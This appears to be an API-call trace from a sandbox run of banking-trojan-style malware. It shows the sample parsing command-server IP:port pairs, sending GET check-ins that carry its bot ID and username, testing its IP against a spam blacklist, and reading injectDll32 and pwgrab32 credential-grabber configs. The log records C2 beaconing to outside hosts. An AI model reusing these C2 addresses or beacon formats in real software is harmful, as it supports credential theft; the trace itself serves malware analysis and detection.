	[0209.140] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.140] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.140] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.140] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.140] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ad1b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16
	[0209.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.140] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ad1b0, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=16 | out: lpWideCharStr="81.177.6.69:447") returned 16
	[0209.140] StrStrIW (lpFirst="81.177.6.69:447", lpSrch=":") returned=":447"
	[0209.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.140] lstrcpynW (in: lpString1=0x2732e18, lpString2="81.177.6.69:447", iMaxLength=12 | out: lpString1="81.177.6.69") returned="81.177.6.69"
	[0209.140] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.140] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa98, Size=0x10) returned 0x22ffa80
	[0209.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.140] lstrcpynW (in: lpString1=0x22ffa98, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733048
	[0209.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.141] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0209.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.141] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732dc8, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=19 | out: lpWideCharStr="95.213.203.228:447") returned 19
	[0209.141] StrStrIW (lpFirst="95.213.203.228:447", lpSrch=":") returned=":447"
	[0209.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.141] lstrcpynW (in: lpString1=0x2732e18, lpString2="95.213.203.228:447", iMaxLength=15 | out: lpString1="95.213.203.228") returned="95.213.203.228"
	[0209.141] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.141] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa80, Size=0x10) returned 0x22ffa98
	[0209.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.141] lstrcpynW (in: lpString1=0x22ffa80, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733070
	[0209.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.141] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0209.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.141] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2732df0, cbMultiByte=-1, lpWideCharStr=0x22a6260, cchWideChar=19 | out: lpWideCharStr="195.123.213.17:447") returned 19
	[0209.141] StrStrIW (lpFirst="195.123.213.17:447", lpSrch=":") returned=":447"
	[0209.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0209.142] lstrcpynW (in: lpString1=0x2732e18, lpString2="195.123.213.17:447", iMaxLength=15 | out: lpString1="195.123.213.17") returned="195.123.213.17"
	[0209.142] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0209.142] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa98, Size=0x10) returned 0x22ffa80
	[0209.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0209.142] lstrcpynW (in: lpString1=0x22ffa98, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0209.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733098
	[0209.142] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0209.142] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0209.142] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0209.142] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa120
	[0209.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0209.142] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d6650) returned 1
	[0209.142] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294d0 | out: lpSystemTimeAsFileTime=0x1294d0*(dwLowDateTime=0x6549fb00, dwHighDateTime=0x1d50a6a)) 
	[0209.142] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x262110) returned 1
	[0209.142] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2d0) returned 1
	[0209.142] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fcb08) returned 1
	[0209.142] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d69e8) returned 1
	[0209.142] GetUserNameW (in: lpBuffer=0x129228, pcbBuffer=0x1294f4 | out: lpBuffer="SYSTEM", pcbBuffer=0x1294f4) returned 1
	[0209.143] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1e4538) returned 1
	[0209.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0209.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0209.143] UrlEscapeW (in: pszUrl="user", pszEscaped=0x2311000, pcchEscaped=0x1289ac, dwFlags=0x0 | out: pszEscaped="user", pcchEscaped=0x1289ac) returned 0x0
	[0209.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0209.143] UrlEscapeW (in: pszUrl="SYSTEM", pszEscaped=0x2311108, pcchEscaped=0x1289ac, dwFlags=0x0 | out: pszEscaped="SYSTEM", pcchEscaped=0x1289ac) returned 0x0
	[0209.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x800) returned 0x22d6650
	[0209.143] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0209.143] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0209.143] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/14/user/SYSTEM/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x22d6e58
	[0209.143] WinHttpSetOption (hInternet=0x22d6e58, dwOption=0x1f, lpBuffer=0x1289b8, dwBufferLength=0x4) returned 1
	[0209.143] WinHttpSendRequest (hRequest=0x22d6e58, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0209.715] WinHttpReceiveResponse (hRequest=0x22d6e58, lpReserved=0x0) returned 1
	[0209.715] WinHttpQueryHeaders (in: hRequest=0x22d6e58, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x1289a8, lpdwBufferLength=0x1289a4, lpdwIndex=0x0 | out: lpBuffer=0x1289a8*, lpdwBufferLength=0x1289a4*=0x4, lpdwIndex=0x0) returned 1
	[0209.715] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d6650) returned 1
	[0209.715] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0209.715] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0209.715] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x129268 | out: lpWSAData=0x129268) returned 0
	[0209.715] gethostname (in: name=0x1293f8, namelen=255 | out: name="ZgW5tdPu") returned 0
	[0209.716] getaddrinfo (in: pNodeName="ZgW5tdPu", pServiceName=0x0, pHints=0x0, ppResult=0x1294f8 | out: ppResult=0x1294f8*=0x1656bb0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname=0x0, ai_addr=0x1656a98*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="fe80:0000:0000:0000:9594:91b6:d807:49d3", sin6_scope_id=0xb), ai_next=0x1656ac0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1656938*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.251"), ai_next=0x0))) returned 0
	[0209.718] FreeAddrInfoW (pAddrInfo=0x1656bb0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname=0x0, ai_addr=0x1656a98*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="fe80:0000:0000:0000:9594:91b6:d807:49d3", sin6_scope_id=0xb), ai_next=0x1656ac0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1656938*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.251"), ai_next=0x0))) 
	[0209.718] WSACleanup () returned 0
	[0209.718] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.718] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa388
	[0209.718] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0209.718] UrlEscapeW (in: pszUrl="NAT status", pszEscaped=0x2311108, pcchEscaped=0x128c84, dwFlags=0x0 | out: pszEscaped="NAT%20status", pcchEscaped=0x128c84) returned 0x0
	[0209.718] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0209.718] UrlEscapeW (in: pszUrl="client is behind NAT", pszEscaped=0x2311000, pcchEscaped=0x128c84, dwFlags=0x0 | out: pszEscaped="client%20is%20behind%20NAT", pcchEscaped=0x128c84) returned 0x0
	[0209.718] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x800) returned 0x22d6650
	[0209.718] WinHttpCloseHandle (hInternet=0x22d6e58) returned 1
	[0209.718] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0209.718] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/14/NAT%20status/client%20is%20behind%20NAT/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0209.718] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128c90, dwBufferLength=0x4) returned 1
	[0209.718] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0210.397] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0210.397] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128c80, lpdwBufferLength=0x128c7c, lpdwIndex=0x0 | out: lpBuffer=0x128c80*, lpdwBufferLength=0x128c7c*=0x4, lpdwIndex=0x0) returned 1
	[0210.397] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d6650) returned 1
	[0210.397] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0210.397] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0210.397] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x66086900, dwHighDateTime=0x1d50a6a)) 
	[0210.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0210.397] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1291a4 | out: lpWSAData=0x1291a4) returned 0
	[0210.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0210.397] StrStrIW (lpFirst="84.182.248.91", lpSrch=".") returned=".182.248.91"
	[0210.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff918
	[0210.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff900
	[0210.397] lstrcpynW (in: lpString1=0x22ff900, lpString2="84.182.248.91", iMaxLength=3 | out: lpString1="84") returned="84"
	[0210.397] StrStrIW (lpFirst="182.248.91", lpSrch=".") returned=".248.91"
	[0210.397] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff918, Size=0x10) returned 0x22ff8e8
	[0210.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff918
	[0210.397] lstrcpynW (in: lpString1=0x22ff918, lpString2="182.248.91", iMaxLength=4 | out: lpString1="182") returned="182"
	[0210.397] StrStrIW (lpFirst="248.91", lpSrch=".") returned=".91"
	[0210.397] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff8e8, Size=0x10) returned 0x22ff960
	[0210.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff8e8
	[0210.397] lstrcpynW (in: lpString1=0x22ff8e8, lpString2="248.91", iMaxLength=4 | out: lpString1="248") returned="248"
	[0210.397] StrStrIW (lpFirst="91", lpSrch=".") returned 0x0
	[0210.397] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff960, Size=0x10) returned 0x22ff858
	[0210.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff960
	[0210.397] lstrcpynW (in: lpString1=0x22ff960, lpString2="91", iMaxLength=3 | out: lpString1="91") returned="91"
	[0210.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b00
	[0210.397] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff960) returned 1
	[0210.397] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff8e8) returned 1
	[0210.397] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff918) returned 1
	[0210.398] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff900) returned 1
	[0210.398] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff858) returned 1
	[0210.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="91.248.182.84.zen.spamhaus.org", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31
	[0210.398] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27330c0
	[0210.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="91.248.182.84.zen.spamhaus.org", cchWideChar=-1, lpMultiByteStr=0x27330c0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="91.248.182.84.zen.spamhaus.org", lpUsedDefaultChar=0x0) returned 31
	[0210.403] getaddrinfo (in: pNodeName="91.248.182.84.zen.spamhaus.org", pServiceName=0x0, pHints=0x1294c4*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1294f0 | out: ppResult=0x1294f0*=0x1656ba8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1656bd0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.10"), ai_next=0x1656af0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1656938*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.4"), ai_next=0x0))) returned 0
	[0210.645] FreeAddrInfoW (pAddrInfo=0x1656ba8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1656bd0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.10"), ai_next=0x1656af0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1656938*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.4"), ai_next=0x0))) 
	[0210.645] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0210.645] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b00) returned 1
	[0210.645] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27330c0) returned 1
	[0210.645] WSACleanup () returned 0
	[0210.645] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22aa388) returned 1
	[0210.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x1e4538
	[0210.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0210.645] UrlEscapeW (in: pszUrl="DNSBL", pszEscaped=0x2311000, pcchEscaped=0x128c84, dwFlags=0x0 | out: pszEscaped="DNSBL", pcchEscaped=0x128c84) returned 0x0
	[0210.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0210.645] UrlEscapeW (in: pszUrl="listed", pszEscaped=0x2311108, pcchEscaped=0x128c84, dwFlags=0x0 | out: pszEscaped="listed", pcchEscaped=0x128c84) returned 0x0
	[0210.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x800) returned 0x22d6650
	[0210.645] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0210.645] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0210.645] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/14/DNSBL/listed/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0210.646] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128c90, dwBufferLength=0x4) returned 1
	[0210.646] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0211.020] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0211.020] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128c80, lpdwBufferLength=0x128c7c, lpdwIndex=0x0 | out: lpBuffer=0x128c80*, lpdwBufferLength=0x128c7c*=0x4, lpdwIndex=0x0) returned 1
	[0211.020] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d6650) returned 1
	[0211.020] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0211.020] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0211.020] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0211.020] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x6667a000, dwHighDateTime=0x1d50a6a)) 
	[0211.020] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0211.020] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c
	[0211.020] GetFileTime (in: hFile=0x57c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0211.020] CloseHandle (hObject=0x57c) returned 1
	[0211.021] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6667a000, dwHighDateTime=0x1d50a6a)) 
	[0211.021] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c
	[0211.021] GetFileTime (in: hFile=0x57c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0211.021] CloseHandle (hObject=0x57c) returned 1
	[0211.021] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6667a000, dwHighDateTime=0x1d50a6a)) 
	[0211.021] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c
	[0211.021] GetFileTime (in: hFile=0x57c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0211.021] CloseHandle (hObject=0x57c) returned 1
	[0211.021] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6667a000, dwHighDateTime=0x1d50a6a)) 
	[0211.021] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0211.021] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c
	[0211.021] GetFileTime (in: hFile=0x57c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0211.021] CloseHandle (hObject=0x57c) returned 1
	[0211.021] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6667a000, dwHighDateTime=0x1d50a6a)) 
	[0211.022] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0211.022] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
